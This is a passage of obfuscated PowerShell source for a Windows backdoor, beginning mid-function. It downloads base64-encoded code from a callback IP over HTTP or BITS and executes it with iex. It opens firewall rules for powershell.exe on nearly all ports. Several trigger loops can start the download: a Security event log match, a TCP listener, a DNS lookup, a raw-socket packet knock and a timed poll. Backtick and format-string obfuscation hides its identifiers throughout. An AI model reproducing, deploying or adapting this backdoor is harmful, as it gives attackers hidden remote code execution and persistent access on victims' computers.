$5KZYIt::"S`eRv`e`RC`e`RTiFIcatEVali`DATiON`cAlLB`A`ck" = {${tr`ue}}
|
||||
${u`RL}="https://$CallbackIP$resource"
|
||||
if(-not ${s`IlenT}) {write-host "Calling home with method $method to: $url"}
|
||||
|
||||
${E`Nc} = (new-object ("{0}{2}{1}"-f'net.','client','web'))."DO`WnlOaD`St`Ring"(${u`RL})
|
||||
}
|
||||
|
||||
elseif (${me`TH`oD} -eq 2)
|
||||
{
|
||||
${u`RL}="http://$CallbackIP$resource"
|
||||
if(-not ${s`iL`EnT}) { write-host "Calling home with method $method to: $url"
|
||||
write-host "BITS Temp output to: $BitsTempFile"}
|
||||
Import-Module ("{0}{1}" -f '*','bits*')
|
||||
Start-BitsTransfer ${u`RL} ${biTS`T`EM`p`FIle} -ErrorAction ("{1}{0}" -f'op','St')
|
||||
|
||||
${e`NC} = Get-Content ${biT`StEMp`FILe} -ErrorAction ("{1}{0}"-f'p','Sto')
|
||||
|
||||
|
||||
Remove-Item ${B`It`St`eMpF`iLe} -ErrorAction ("{1}{3}{2}{0}"-f 'tinue','Si','entlyCon','l')
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
if(-not ${s`I`leNt}) { write-host "Error: Improper callback method" -fore ("{1}{0}"-f 'ed','r')}
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
if (${e`Nc})
|
||||
{
|
||||
|
||||
${B} = (Gi ("{0}{1}{3}{2}"-f'VarIA','BLe:nz','p','v2A') ).vALuE::"f`RombAS`E64`stR`ING"(${E`NC})
|
||||
${D`Ec} = ( gI ("VArIA"+"ble"+":T1o5")).VaLuE::"U`Tf8"."gETStr`i`NG"(${b})
|
||||
|
||||
|
||||
iex ${D`EC}
|
||||
}
|
||||
else
|
||||
{
|
||||
if(-not ${s`ILE`Nt}) { write-host "Error: No Data Downloaded" -fore ("{0}{1}"-f'r','ed')}
|
||||
return 0
|
||||
}
|
||||
}
|
||||
catch [System.Net.WebException]{
|
||||
if(-not ${sIl`Ent}) { write-host "Error: Network Callback failed" -fore ("{0}{1}" -f'r','ed')}
|
||||
return 0
|
||||
}
|
||||
catch [System.FormatException]{
|
||||
if(-not ${s`IlE`NT}) { write-host "Error: Base64 Format Problem" -fore ("{1}{0}" -f 'ed','r')}
|
||||
return 0
|
||||
}
|
||||
catch [System.Exception]{
|
||||
if(-not ${S`ILEnt}) { write-host "Error: Uknown problem during transfer" -fore ("{0}{1}" -f 'r','ed')}
|
||||
|
||||
return 0
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
if(-not ${sile`NT}) { write-host "No host specified for the phone home :(" -fore ("{1}{0}"-f'ed','r')}
|
||||
return 0
|
||||
}
|
||||
|
||||
return 1
|
||||
}
|
||||
|
||||
function Ad`D-PS`FIrE`wA`LLru`Les
|
||||
{
|
||||
|
||||
Param(
|
||||
[Parameter(MaNDaToRY=${FA`LsE},pOsITion=1)]
|
||||
[string]${ruL`en`Ame}="Windows Powershell",
|
||||
[Parameter(maNDAtorY=${F`A`lSe},PoSItioN=2)]
|
||||
[string]${e`xE`PATH}="C:\windows\system32\windowspowershell\v1.0\powershell.exe",
|
||||
[Parameter(maNdatOry=${fAL`SE},poSitIon=3)]
|
||||
[string]${P`oRtS}="1-65000"
|
||||
)
|
||||
|
||||
If (-NOT ([Security.Principal.WindowsPrincipal] (GeT-vArIAblE ("zN"+"U") -ValueO )::"GEtCu`RR`eNt"())."IS`inR`OLe"([Security.Principal.WindowsBuiltInRole] "Administrator"))
|
||||
{
|
||||
Write-Host "This command requires Admin :(... get to work! "
|
||||
Return
|
||||
}
|
||||
|
||||
|
||||
${fw} = New-Object -ComObject ("{2}{1}{3}{0}"-f'2','cfg.fwp','hnet','olicy')
|
||||
${R`ULE} = New-Object -ComObject ("{2}{1}{3}{0}" -f 'e','NetCf','H','g.FWRul')
|
||||
${R`ulE}."n`AME" = ${Rul`E`Na`ME}
|
||||
${R`ULE}."apP`LICAt`I`Onna`Me"=${e`XEPA`TH}
|
||||
${RU`Le}."p`RO`TOcOL" = 6
|
||||
${rU`LE}."loC`A`LPOrTS" = ${p`oRtS}
|
||||
${ru`LE}."dI`ReCTIOn" = 2
|
||||
${Ru`Le}."E`NA`BlED"=${t`RuE}
|
||||
${R`Ule}."g`Ro`upinG"="@firewallapi.dll,-23255"
|
||||
${ru`LE}."pro`FiL`ES" = 7
|
||||
${R`uLe}."A`cTiON"=1
|
||||
${r`uLe}."EDGetRA`V`E`RSAl"=${f`AlSE}
|
||||
${fw}."r`ulES"."a`Dd"(${ru`lE})
|
||||
|
||||
|
||||
${r`ULe} = New-Object -ComObject ("{3}{0}{2}{1}"-f '.FWR','le','u','HNetCfg')
|
||||
${rU`Le}."Na`Me" = ${RulE`NAME}
|
||||
${Ru`Le}."APPLICa`Tio`NN`A`me"=${E`x`EpAth}
|
||||
${rU`LE}."p`RoTOcoL" = 17
|
||||
${r`ule}."LoCAL`po`RTS" = ${P`orTs}
|
||||
${rU`le}."DiRe`cTI`ON" = 2
|
||||
${RU`le}."en`AblEd"=${tR`uE}
|
||||
${R`uLE}."GroupI`Ng"="@firewallapi.dll,-23255"
|
||||
${R`uLe}."p`ROfi`LEs" = 7
|
||||
${R`ULe}."aCt`i`oN"=1
|
||||
${Ru`Le}."EDgeTrAVE`R`saL"=${f`A`lse}
|
||||
${Fw}."Rul`es"."a`dd"(${r`uLE})
|
||||
|
||||
|
||||
${ru`LE} = New-Object -ComObject ("{1}{0}{2}{3}"-f'fg.F','HNetC','WRu','le')
|
||||
${rU`Le}."NA`mE" = ${Ru`le`NAme}
|
||||
${R`ULe}."a`ppLICationNa`ME"=${E`XepAth}
|
||||
${Ru`LE}."P`R`otOcOl" = 6
|
||||
${R`UlE}."L`O`caLporTS" = ${Por`Ts}
|
||||
${R`ulE}."d`I`REcTiOn" = 1
|
||||
${ru`lE}."ENA`BL`ED"=${tr`UE}
|
||||
${r`UlE}."gro`uPI`Ng"="@firewallapi.dll,-23255"
|
||||
${r`uLE}."Pr`O`FILEs" = 7
|
||||
${r`Ule}."A`C`TiON"=1
|
||||
${ru`lE}."EDgE`TRAV`ERSaL"=${fA`lsE}
|
||||
${F`w}."RU`les"."A`dd"(${RU`lE})
|
||||
|
||||
|
||||
${r`UlE} = New-Object -ComObject ("{0}{1}{2}{3}" -f 'H','NetCfg','.FW','Rule')
|
||||
${r`uLE}."n`AMe" = ${ruleNa`me}
|
||||
${Ru`le}."APp`LicaT`I`oN`NamE"=${ExePa`TH}
|
||||
${rU`Le}."P`Rot`OCol" = 17
|
||||
${RU`Le}."Loc`Alp`ORTs" = ${poR`Ts}
|
||||
${r`ulE}."DIRectI`on" = 1
|
||||
${r`ulE}."en`A`BLeD"=${t`Rue}
|
||||
${RU`Le}."Gr`oUP`iNG"="@firewallapi.dll,-23255"
|
||||
${r`UlE}."PrO`F`ileS" = 7
|
||||
${r`uLE}."A`CTI`ON"=1
|
||||
${R`ule}."Ed`gET`RaV`eRsaL"=${F`ALSe}
|
||||
${F`W}."r`uLEs"."A`Dd"(${R`ule})
|
||||
|
||||
}
|
||||
|
||||
function InVOk`e`-EVeNTLoop
|
||||
{
|
||||
|
||||
Param(
|
||||
[Parameter(mANdAtOry=${T`RUE},POsiTion=1)]
|
||||
[string]${cAlLBa`Ck`Ip},
|
||||
[Parameter(MaNdAtoRY=${fA`lSE},PosITion=2)]
|
||||
[string]${tRI`GG`ER}="SIXDUB",
|
||||
[Parameter(MAnDaTORy=${F`AL`SE},PoSITIOn=3)]
|
||||
[int]${tiM`EoUt}=0,
|
||||
[Parameter(maNDatOry=${fA`LSE},PosiTiON=4)]
|
||||
[int] ${s`lEEP}=1
|
||||
)
|
||||
|
||||
If (-NOT ([Security.Principal.WindowsPrincipal] ( vARIABLe ('z'+'NU') -vALUEONl)::"gEtc`ur`ReNT"())."IsiN`RoLE"([Security.Principal.WindowsBuiltInRole] "Administrator"))
|
||||
{
|
||||
Write-Host "This backdoor requires Admin :(... get to work! "
|
||||
Return
|
||||
}
|
||||
|
||||
write-host "Timeout: $Timeout"
|
||||
write-host "Trigger: $Trigger"
|
||||
write-host "CallbackIP: $CallbackIP"
|
||||
write-host
|
||||
write-host "Starting backdoor..."
|
||||
|
||||
|
||||
${rUN`Ni`NG}=${t`RUE}
|
||||
${mAT`ch} =""
|
||||
${s`TArt`TImE} = get-date
|
||||
while(${runn`i`Ng})
|
||||
{
|
||||
|
||||
if (${timE`ouT} -ne 0 -and ($( ( vaRIAble ('I6S5n'+'r') ).VALuE::"N`OW") -gt ${st`A`RTtI`mE}."aDDs`ECO`NDs"(${ti`MEO`ut})))
|
||||
{
|
||||
${rUn`N`inG}=${FA`lSE}
|
||||
}
|
||||
|
||||
${D} = Get-Date
|
||||
${n`eW`EVEnTs} = Get-WinEvent -FilterHashtable @{"l`og`NAMe"='Security'; "ST`ArTT`IME"=${D}."aDDSecO`N`DS"(-${Sl`eEp})} -ErrorAction ("{2}{1}{0}"-f'ntinue','Co','Silently') | fl ("{1}{2}{0}" -f'e','M','essag') | Out-String
|
||||
|
||||
|
||||
if (${nEw`even`TS} -match ${Tri`Gg`eR})
|
||||
{
|
||||
${runN`i`NG}=${FA`lSE}
|
||||
${MAt`Ch} = ${C`Al`lbA`ckIP}
|
||||
write-host "Match: $match"
|
||||
}
|
||||
sleep -s ${Sl`E`EP}
|
||||
}
|
||||
if(${m`Atch})
|
||||
{
|
||||
${suc`c`ESS} = Invoke-CallbackIEX ${MA`T`Ch}
|
||||
}
|
||||
}
|
||||
|
||||
function iNvo`KE`-pORTB`i`ND
|
||||
{
|
||||
|
||||
Param(
|
||||
[Parameter(MANdatory=${f`AlsE},PoSiTion=1)]
|
||||
[string]${Cal`L`BAckiP},
|
||||
[Parameter(maNDaTOrY=${fA`lse},pOSItIon=2)]
|
||||
[string]${L`ocalIP},
|
||||
[Parameter(mANDatorY=${f`ALSe},POsitION=3)]
|
||||
[int]${P`OrT}=4444,
|
||||
[Parameter(maNdAToRy=${F`AlsE},pOSiTIoN=4)]
|
||||
[string]${t`R`iGgEr}="QAZWSX123",
|
||||
[Parameter(MAnDAtoRY=${FA`LSE},POSiTion=5)]
|
||||
[int]${TIM`E`ouT}=0
|
||||
)
|
||||
|
||||
|
||||
if (-not ${LOc`A`lIP})
|
||||
{
|
||||
route ("{1}{0}"-f'int','pr') ('0*') | % {
|
||||
if (${_} -match "\s{2,}0\.0\.0\.0") {
|
||||
${N`ulL},${NU`ll},${N`ulL},${L`oCALIP},${n`uLl} = (VARiABle ('Q8w'+'Gpc') -VaLUeoNL )::"REp`LA`cE"(${_}."trI`MSTa`RT"(" "),"\s{2,}",",")."sPl`it"(",")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
write-host "!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!"
|
||||
write-host "Timeout: $Timeout"
|
||||
write-host "Port: $Port"
|
||||
write-host "Trigger: $Trigger"
|
||||
write-host "Using IPv4 Address: $LocalIP"
|
||||
write-host "CallbackIP: $CallbackIP"
|
||||
write-host
|
||||
write-host "Starting backdoor..."
|
||||
try{
|
||||
|
||||
|
||||
${iPeNd`POi`Nt} = new-object ("{2}{1}{0}{5}{4}{3}" -f't.ip','m.ne','syste','t','in','endpo')([net.ipaddress]"$localIP",${P`Ort})
|
||||
${li`sTE`NEr} = new-object ("{0}{2}{7}{4}{6}{8}{1}{5}{3}" -f 'Sys','n','tem.','r','ock','e','ets.TcpLi','Net.S','ste') ${i`p`En`DPoinT}
|
||||
${L`Isten`er}."St`Art"()
|
||||
|
||||
|
||||
${RU`N`NinG}=${tr`Ue}
|
||||
${M`AtCH} =""
|
||||
${sta`R`TTi`ME} = get-date
|
||||
while(${RU`Nn`inG})
|
||||
{
|
||||
|
||||
if (${T`IMEO`ut} -ne 0 -and ($( ( Gi ("{2}{0}{3}{1}"-f 'RiaBlE','5NR','VA',':I6S') ).VALue::"N`ow") -gt ${St`AR`TTIME}."Ad`d`sECoNds"(${Ti`M`eOuT})))
|
||||
{
|
||||
${Ru`NN`inG}=${Fa`L`se}
|
||||
}
|
||||
|
||||
|
||||
if(${l`ISTE`NER}."Pe`Nd`Ing"())
|
||||
{
|
||||
|
||||
${cL`I`EnT} = ${liSt`EN`Er}."accE`PTtcp`cl`IE`Nt"()
|
||||
write-host "Client Connected!"
|
||||
${S`TR`eam} = ${cl`IENT}."Ge`Tst`REAm"()
|
||||
${REAd`ER} = new-object ("{3}{0}{4}{2}{1}" -f 'IO.','eader','reamR','System.','St') ${st`REAm}
|
||||
|
||||
|
||||
${Li`NE} = ${RE`AD`Er}."reA`D`Line"()
|
||||
|
||||
|
||||
if (${LI`Ne} -eq ${tRIG`G`Er})
|
||||
{
|
||||
${ru`Nni`Ng}=${FA`lSE}
|
||||
${M`AT`CH} = ([system.net.ipendpoint] ${C`LI`enT}."cL`ieNt"."rEmotE`enDP`O`i`Nt")."aDD`R`ESS"."tOsTr`ING"()
|
||||
write-host "MATCH: $match"
|
||||
}
|
||||
|
||||
|
||||
${reaD`eR}."dI`SpoSe"()
|
||||
${ST`R`eAM}."dISPO`SE"()
|
||||
${cli`E`NT}."c`LosE"()
|
||||
write-host "Client Disconnected"
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
write-host "Stopping Socket"
|
||||
${l`ISTenEr}."s`TOp"()
|
||||
if(${mA`TCh})
|
||||
{
|
||||
if(${CA`lLb`A`Ckip})
|
||||
{
|
||||
${Suc`CesS} = Invoke-CallbackIEX ${c`AlLbA`cKIp}
|
||||
}
|
||||
else
|
||||
{
|
||||
${SuC`cE`Ss} = Invoke-CallbackIEX ${MAt`Ch}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch [System.Net.Sockets.SocketException] {
|
||||
write-host "Error: Socket Error" -fore ("{0}{1}"-f're','d')
|
||||
}
|
||||
}
|
||||
|
||||
function InVo`kE`-`DNsL`OOp
|
||||
{
|
||||
|
||||
param(
|
||||
[Parameter(mAndATOry=${FA`lse},pOsiTIOn=1)]
|
||||
[string]${C`AllBack`IP},
|
||||
[Parameter(MandATOrY=${fa`l`se},POsitioN=2)]
|
||||
[string]${HO`S`TnaMe}="yay.sixdub.net",
|
||||
[Parameter(MaNDaTOry=${fA`lSe},POsitiOn=3)]
|
||||
[string]${TrIg`G`ER}="127.0.0.1",
|
||||
[Parameter(MaNDaToRY=${F`Al`se},PoSItIOn=4)]
|
||||
[int] ${TIme`O`Ut}=0,
|
||||
[Parameter(mAnDAtory=${Fa`l`SE},PoSItioN=5)]
|
||||
[int] ${sLe`Ep}=1
|
||||
)
|
||||
|
||||
|
||||
write-host "Timeout: $Timeout"
|
||||
write-host "Sleep Time: $Sleep"
|
||||
write-host "Trigger: $Trigger"
|
||||
write-host "Using Hostname: $Hostname"
|
||||
write-host "CallbackIP: $CallbackIP"
|
||||
write-host
|
||||
write-host "Starting backdoor..."
|
||||
|
||||
|
||||
${r`UN`NinG}=${tr`ue}
|
||||
${mat`cH} =""
|
||||
${Sta`RTt`ime} = get-date
|
||||
while(${RUn`NIng})
|
||||
{
|
||||
|
||||
if (${Tim`EouT} -ne 0 -and ($( ( gET-vARIAble ("I6s5"+"Nr") ).value::"N`Ow") -gt ${Sta`R`TtiME}."aDDSec`O`Nds"(${TIM`eO`Ut})))
|
||||
{
|
||||
${R`uN`NInG}=${Fa`L`sE}
|
||||
}
|
||||
|
||||
try {
|
||||
|
||||
${I`pS} = ( Get-VArIABle ("{1}{0}"-f 'RIxE','t') -vA)::"gEtH`OsTaD`DrEsS`Es"(${HO`stN`A`ME})
|
||||
foreach (${ad`Dr} in ${I`Ps})
|
||||
{
|
||||
|
||||
|
||||
${r`Es`OL`Ved}=${a`DDR}."IpADdrESsT`Os`T`RING"
|
||||
if(${reS`OL`VEd} -ne ${tR`I`Gger})
|
||||
{
|
||||
${RuN`NIng}=${F`AL`Se}
|
||||
${mA`TcH}=${re`SOLv`Ed}
|
||||
write-host "Match: $match"
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
catch [System.Net.Sockets.SocketException]{
|
||||
|
||||
}
|
||||
|
||||
sleep -s ${s`L`eEp}
|
||||
}
|
||||
write-host "Shutting down DNS Check..."
|
||||
if(${ma`Tch})
|
||||
{
|
||||
if(${CAlLbAc`K`IP})
|
||||
{
|
||||
${su`cce`ss} = Invoke-CallbackIEX ${cA`lLBack`ip}
|
||||
}
|
||||
else
|
||||
{
|
||||
${su`ccE`sS} = Invoke-CallbackIEX ${m`ATch}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function inVok`e-P`ACKe`TkNOcK
|
||||
{
|
||||
|
||||
param(
|
||||
[Parameter(MANdaTorY=${faL`sE},pOsitIoN=1)]
|
||||
[string]${CaLL`B`Ack`iP},
|
||||
[Parameter(MANdatoRy=${f`Alse},POSiTion=2)]
|
||||
[string]${lo`cAL`iP},
|
||||
[Parameter(maNdatOrY=${f`AlSE},PoSiTIOn=3)]
|
||||
[string]${tRIgG`eR}="QAZWSX123",
|
||||
[Parameter(mAndaTORY=${fal`SE},pOsITIon=4)]
|
||||
[int]${tI`Me`OUt}=0
|
||||
)
|
||||
If (-NOT ([Security.Principal.WindowsPrincipal] ( get-VARIABle ("Zn"+"u") -vaLueONLy)::"GE`TCuRr`e`NT"())."i`sIn`RoLe"([Security.Principal.WindowsBuiltInRole] "Administrator"))
|
||||
{
|
||||
Write-Host "This backdoor requires Admin :(... get to work! "
|
||||
Return
|
||||
}
|
||||
|
||||
if (-not ${lo`caLIP})
|
||||
{
|
||||
route ("{1}{0}" -f'int','pr') ('0*') | % {
|
||||
if (${_} -match "\s{2,}0\.0\.0\.0") {
|
||||
${nU`lL},${n`ULL},${nu`Ll},${L`oC`AliP},${n`ull} = ( lS ("vaRIaBlE"+":Q8WgP"+"C") ).vALue::"re`P`lACE"(${_}."T`Ri`mStArT"(" "),"\s{2,}",",")."SP`lIt"(",")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
write-host "!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!"
|
||||
write-host "Timeout: $Timeout"
|
||||
write-host "Trigger: $Trigger"
|
||||
write-host "Using IPv4 Address: $LocalIP"
|
||||
write-host "CallbackIP: $CallbackIP"
|
||||
write-host
|
||||
write-host "Starting backdoor..."
|
||||
|
||||
|
||||
${BY`TE`IN} = new-object ("{1}{0}" -f 'te[]','by') 4
|
||||
${BY`TE`oUT} = new-object ("{2}{0}{1}" -f't','e[]','by') 4
|
||||
${by`T`edata} = new-object ("{0}{1}" -f 'byte[',']') 4096
|
||||
|
||||
${BYTE`iN}[0] = 1
|
||||
${b`YT`EIn}[1-3] = 0
|
||||
${byT`eOut}[0-3] = 0
|
||||
|
||||
|
||||
${s`OCket} = new-object ("{5}{3}{2}{6}{4}{0}{1}" -f 'kets','.socket','n','stem.','soc','sy','et.')( (DIR ("{2}{0}{3}{1}{4}"-f'lE:','fI','vaRIAb','L8','uY')).value::"iNte`R`Ne`TwoRk", (GCi ("{1}{0}{2}{3}"-f'aRIABLe:2','v','64p','VJ') ).ValUE::"r`AW", $EaCs::"Ip")
|
||||
${s`ocK`Et}."sEtSOc`ketopti`On"("IP","HeaderIncluded",${t`RUe})
|
||||
${So`CK`eT}."re`ceIve`BufFEr`sIzE" = 819200
|
||||
|
||||
|
||||
${i`pE`N`dpoint} = new-object ("{6}{2}{0}{5}{4}{1}{3}"-f'em.n','i','t','nt','ipendpo','et.','sys')([net.ipaddress]"$localIP",0)
|
||||
${S`OCkEt}."b`inD"(${i`pendP`oI`NT})
|
||||
|
||||
|
||||
[void]${s`Oc`kEt}."IocoNtr`ol"( $jmhB::"r`EceIV`eA`ll",${bYT`eiN},${B`yT`eoUt})
|
||||
|
||||
|
||||
${s`T`AR`TTiME} = get-date
|
||||
${rUN`NiNG} = ${Tr`Ue}
|
||||
${MAt`cH} = ""
|
||||
${p`Ack`Ets} = @()
|
||||
while (${r`UN`NiNg})
|
||||
{
|
||||
|
||||
if (${T`I`MeOut} -ne 0 -and ($( (GET-chIldiTEM ("{3}{0}{4}{2}{1}"-f'arIABLe:','s5NR','6','V','i') ).vaLUe::"N`OW") -gt ${St`A`R`TtimE}."a`d`dsecONDS"(${tI`MeoUT})))
|
||||
{
|
||||
${RU`Nn`INg}=${f`ALSe}
|
||||
}
|
||||
|
||||
if (-not ${S`oCkeT}."aV`AIlA`BLe")
|
||||
{
|
||||
start-sleep -milliseconds 500
|
||||
continue
|
||||
}
|
||||
|
||||
|
||||
${R`cV} = ${s`Ock`ET}."rE`Ce`IVe"(${Byt`E`DATA},0,${BYTe`d`A`Ta}."lEN`GtH", $y4HBR::"NO`NE")
|
||||
|
||||
|
||||
${meMOr`YS`Tr`eAm} = new-object ("{5}{6}{3}{1}{2}{0}{4}" -f 'mo','.M','e','O','ryStream','Syste','m.I')(${B`Y`TedatA},0,${r`cv})
|
||||
${B`InArYRE`A`Der} = new-object ("{0}{4}{1}{3}{2}"-f 'Syst','.Bi','der','naryRea','em.IO')(${mEm`o`RYstREAM})
|
||||
|
||||
|
||||
${T`RaSH} = ${B`iN`A`RYrea`DER}."rE`A`DbytEs"(12)
|
||||
|
||||
|
||||
${SO`Ur`Ceip`A`dDRess} = ${BInA`RYREa`DEr}."reA`DUin`T32"()
|
||||
${sOU`Rc`Eip`AddrEsS} = [System.Net.IPAddress]${SO`U`RceiP`ADD`REss}
|
||||
${Des`TinAtiOnIP`A`DD`RESs} = ${B`InaRYr`e`ADeR}."reAd`u`INt32"()
|
||||
${d`ESt`i`NA`TioNIPAd`Dre`SS} = [System.Net.IPAddress]${de`s`T`INAtIONIpaddR`E`ss}
|
||||
${REmai`NDerb`Y`Tes} = ${bIn`ArY`R`EAder}."R`EA`DbYTeS"(${me`M`OrysT`Re`AM}."l`En`gTH")
|
||||
|
||||
|
||||
${ASciie`N`CODIng} = new-object ("{3}{1}{4}{2}{0}" -f 'iiencoding','stem','xt.asc','sy','.te')
|
||||
${reMaINd`E`ROfPAcK`et} = ${asc`Iienc`oDing}."g`ETS`TRINg"(${remai`Nder`B`Y`Tes})
|
||||
|
||||
|
||||
${b`InarY`R`EaDEr}."c`loSe"()
|
||||
${m`eM`OryStR`E`AM}."Cl`Ose"()
|
||||
|
||||
|
||||
if (${R`EmA`IndER`OFPA`C`KEt} -match ${T`RiG`ger})
|
||||
{
|
||||
write-host "Match: " ${SourCE`iPa`D`d`ReSS}
|
||||
${r`uNNi`Ng}=${FAl`SE}
|
||||
${MAt`ch} = ${S`ourCEIpaD`d`Re`sS}
|
||||
}
|
||||
}
|
||||
|
||||
if(${MA`T`CH})
|
||||
{
|
||||
if(${cAL`lB`AcK`ip})
|
||||
{
|
||||
${S`uCC`EsS} = Invoke-CallbackIEX ${C`A`llbaCKIp}
|
||||
}
|
||||
else
|
||||
{
|
||||
${sU`Cce`ss} = Invoke-CallbackIEX ${Ma`Tch}
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
function i`N`Vok`E-CalLb`AC`KLOop
|
||||
{
|
||||
|
||||
Param(
|
||||
[Parameter(MaNdATorY=${tR`uE},PoSitIoN=1)]
|
||||
[string]${c`All`Ba`ckIP},
|
||||
[Parameter(maNDatoRY=${f`AL`se},poSItION=2)]
|
||||
[int]${tiME`O`ut}=0,
|
||||
[Parameter(ManDATORy=${Fa`LSE},poSiTion=3)]
|
||||
[int] ${Sle`Ep}=1
|
||||
)
|
||||
|
||||
|
||||
write-host "Timeout: $Timeout"
|
||||
write-host "Sleep: $Sleep"
|
||||
write-host "CallbackIP: $CallbackIP"
|
||||
write-host
|
||||
write-host "Starting backdoor..."
|
||||
|
||||
|
||||
${Runn`I`NG}=${t`RuE}
|
||||
${ma`T`ch} =""
|
||||
${s`TART`TiMe} = get-date
|
||||
while(${r`u`NNing})
|
||||
{
|
||||
|
||||
if (${Ti`MeOuT} -ne 0 -and ($( ( gET-VARIAblE ("i6S"+"5nR") -vAlue)::"n`ow") -gt ${St`ArTTi`mE}."addS`e`conds"(${TI`mE`ouT})))
|
||||
{
|
||||
${Ru`N`NiNg}=${F`Al`sE}
|
||||
}
|
||||
|
||||
${Ch`E`cksucce`ss} = Invoke-CallbackIEX ${C`ALLB`AcKiP} -Silent ${Tr`uE}
|
||||
|
||||
if(${ch`e`ckS`UCc`ESs} -eq 1)
|
||||
{
|
||||
${R`unn`inG}=${fal`Se}
|
||||
}
|
||||
|
||||
sleep -s ${s`l`EeP}
|
||||
}
|
||||
|
||||
write-host "Shutting down backdoor..."
|
||||
}
|
Loading…
Reference in New Issue